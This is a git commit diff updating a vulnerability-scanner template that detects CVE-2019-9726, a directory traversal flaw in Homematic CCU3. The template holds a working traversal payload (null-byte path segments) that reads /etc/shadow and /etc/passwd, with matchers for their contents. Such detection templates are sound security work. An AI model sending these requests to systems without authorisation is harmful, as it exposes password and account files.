Update and rename CVE-2019-9726.yaml to cves/2019/CVE-2019-9726.yaml

patch-1
Prince Chaddha 2022-02-27 20:16:53 +05:30 committed by GitHub
parent fa5bef5265
commit 7a43f7d77c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 8 deletions

View File

@ -1,6 +1,6 @@
id: CVE-2019-9726
info:
name: Directory Traversal / Arbitrary File Read in Homematic CCU3
name: Homematic CCU3 - Directory Traversal / Arbitrary File Read in
author: 0x_Akoko
severity: high
description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
@ -12,20 +12,22 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-9726
cwe-id: CWE-22
tags: cve,cve2019,homsmstic,lfi
tags: cve,cve2019,homematic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/.%00./.%00./etc/shadow"
- "{{BaseURL}}/.%00./.%00./etc/passwd"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition: or
- type: status
status:
- 200